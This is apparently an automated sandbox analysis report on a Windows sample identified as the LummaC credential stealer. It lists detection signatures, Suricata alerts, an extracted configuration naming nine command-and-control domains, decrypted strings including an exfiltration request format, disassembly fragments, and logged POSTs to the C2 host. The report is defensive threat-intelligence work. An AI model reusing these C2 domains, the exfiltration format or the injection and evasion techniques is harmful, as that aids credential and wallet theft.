Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tesr.exe

Overview

General Information

Sample name:tesr.exe
Analysis ID:1589840
MD5:4f96b4d0061d45b08d73e3526d82630f
SHA1:15d6d2445d55db393adf30f0bf7f4b649c098257
SHA256:30bc5b4729f0ae6ea5e1eb44654e739040f29941b5e6d2436b10ae93a98e5e6b
Tags:exeghd78sgithubuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • tesr.exe (PID: 2380 cmdline: "C:\Users\user\Desktop\tesr.exe" MD5: 4F96B4D0061D45B08D73E3526D82630F)
    • dxdiag.exe (PID: 5392 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
{"C2 url": ["formy-spill.biz", "dare-curbys.biz", "covery-mover.biz", "mutterunurse.click", "zinc-sneark.biz", "se-blurry.biz", "impend-differ.biz", "dwell-exclaim.biz", "print-vexer.biz"], "Build id": "xMnLq7--RLC"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.2241070978.0000000002C45000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: dxdiag.exe PID: 5392JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: dxdiag.exe PID: 5392JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: dxdiag.exe PID: 5392JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T08:34:24.941198+010020283713Unknown Traffic192.168.2.549720104.21.90.18443TCP
                2025-01-13T08:34:26.202678+010020283713Unknown Traffic192.168.2.549722104.21.90.18443TCP
                2025-01-13T08:34:27.447402+010020283713Unknown Traffic192.168.2.549723104.21.90.18443TCP
                2025-01-13T08:34:29.402372+010020283713Unknown Traffic192.168.2.549725104.21.90.18443TCP
                2025-01-13T08:34:30.626463+010020283713Unknown Traffic192.168.2.549731104.21.90.18443TCP
                2025-01-13T08:34:32.081543+010020283713Unknown Traffic192.168.2.549742104.21.90.18443TCP
                2025-01-13T08:34:33.660210+010020283713Unknown Traffic192.168.2.549753104.21.90.18443TCP
                2025-01-13T08:34:35.821669+010020283713Unknown Traffic192.168.2.549770104.21.90.18443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T08:34:25.476622+010020546531A Network Trojan was detected192.168.2.549720104.21.90.18443TCP
                2025-01-13T08:34:26.690310+010020546531A Network Trojan was detected192.168.2.549722104.21.90.18443TCP
                2025-01-13T08:34:36.285586+010020546531A Network Trojan was detected192.168.2.549770104.21.90.18443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T08:34:25.476622+010020498361A Network Trojan was detected192.168.2.549720104.21.90.18443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T08:34:26.690310+010020498121A Network Trojan was detected192.168.2.549722104.21.90.18443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T08:34:28.392365+010020480941Malware Command and Control Activity Detected192.168.2.549723104.21.90.18443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T08:34:33.702654+010028438641A Network Trojan was detected192.168.2.549753104.21.90.18443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "dare-curbys.biz", "covery-mover.biz", "mutterunurse.click", "zinc-sneark.biz", "se-blurry.biz", "impend-differ.biz", "dwell-exclaim.biz", "print-vexer.biz"], "Build id": "xMnLq7--RLC"}
                Source: tesr.exeVirustotal: Detection: 35%Perma Link
                Source: tesr.exeReversingLabs: Detection: 28%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                Source: tesr.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: impend-differ.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: print-vexer.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: dare-curbys.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: covery-mover.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: formy-spill.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: dwell-exclaim.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: se-blurry.biz
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: mutterunurse.click
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2169044015.000002C3E79D1000.00000004.00000020.00020000.00000000.sdmpString decryptor: xMnLq7--RLC
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_00416B7E CryptUnprotectData,2_2_00416B7E
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.5:49770 version: TLS 1.2
                Source: tesr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]2_2_0040A960
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]2_2_00426170
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then push eax2_2_0040C36E
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_0043DBD0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, ecx2_2_00409CC0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh2_2_0043DCF0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [edx], bl2_2_0040CE55
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]2_2_0042C6D7
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0042C6D7
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]2_2_0042C6D7
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]2_2_0042C6D7
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [eax], dx2_2_00417E82
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh2_2_0043E690
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]2_2_0042BFD3
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]2_2_0042BFDA
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042A060
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]2_2_00425F7D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, ecx2_2_0041D074
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, ecx2_2_0041D087
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042D085
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042D085
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]2_2_0041597D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]2_2_00416E97
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edi, eax2_2_00416E97
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ebx, eax2_2_00405910
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ebp, eax2_2_00405910
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h2_2_00425920
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004286F0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]2_2_00417190
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax2_2_00422270
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h2_2_0040C274
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [00444284h]2_2_00425230
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043CAC0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]2_2_004292D0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, ebx2_2_004292D0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042AAD0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00415ADC
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, bx2_2_0042536C
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]2_2_00402B70
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_00427307
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]2_2_00436B20
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043CBD6
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407470
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407470
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp eax2_2_0042B475
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h2_2_00419C10
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043CCE0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0042B4BB
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043CD60
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004345F0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]2_2_00427653
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_0043CE00
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0042A630
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]2_2_004296D8
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]2_2_00415EE0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00421EE0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp al, 2Eh2_2_004266E7
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004286F0
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]2_2_00416E97
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edi, eax2_2_00416E97
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h2_2_0041CEA5
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then add ebx, 03h2_2_00428F5D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]2_2_00425F7D
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h2_2_00414F08
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, edx2_2_00414F08
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00420717
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_00420717
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h2_2_0043DFB0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49722 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49720 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49720 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49753 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49770 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49723 -> 104.21.90.18:443
                Source: Malware configuration extractorURLs: formy-spill.biz
                Source: Malware configuration extractorURLs: dare-curbys.biz
                Source: Malware configuration extractorURLs: covery-mover.biz
                Source: Malware configuration extractorURLs: mutterunurse.click
                Source: Malware configuration extractorURLs: zinc-sneark.biz
                Source: Malware configuration extractorURLs: se-blurry.biz
                Source: Malware configuration extractorURLs: impend-differ.biz
                Source: Malware configuration extractorURLs: dwell-exclaim.biz
                Source: Malware configuration extractorURLs: print-vexer.biz
                Source: global trafficTCP traffic: 192.168.2.5:49373 -> 1.1.1.1:53
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49753 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49770 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 104.21.90.18:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.90.18:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mutterunurse.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: mutterunurse.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BDLB8W6B9SBZAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12803Host: mutterunurse.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2FNUTFDGJXUM0GLQYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: mutterunurse.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9XHRDZBQH6NW90GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20547Host: mutterunurse.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5NB1T9VDRO9LGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: mutterunurse.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J9WN8UYPFXGQ22X3TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584195Host: mutterunurse.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: mutterunurse.click
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mutterunurse.click
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mutterunurse.click
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: dxdiag.exe, 00000002.00000003.2225256167.000000000509D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: dxdiag.exe, 00000002.00000003.2226701499.000000000500E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: dxdiag.exe, 00000002.00000003.2193810951.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193668660.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2193589244.0000000004FCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
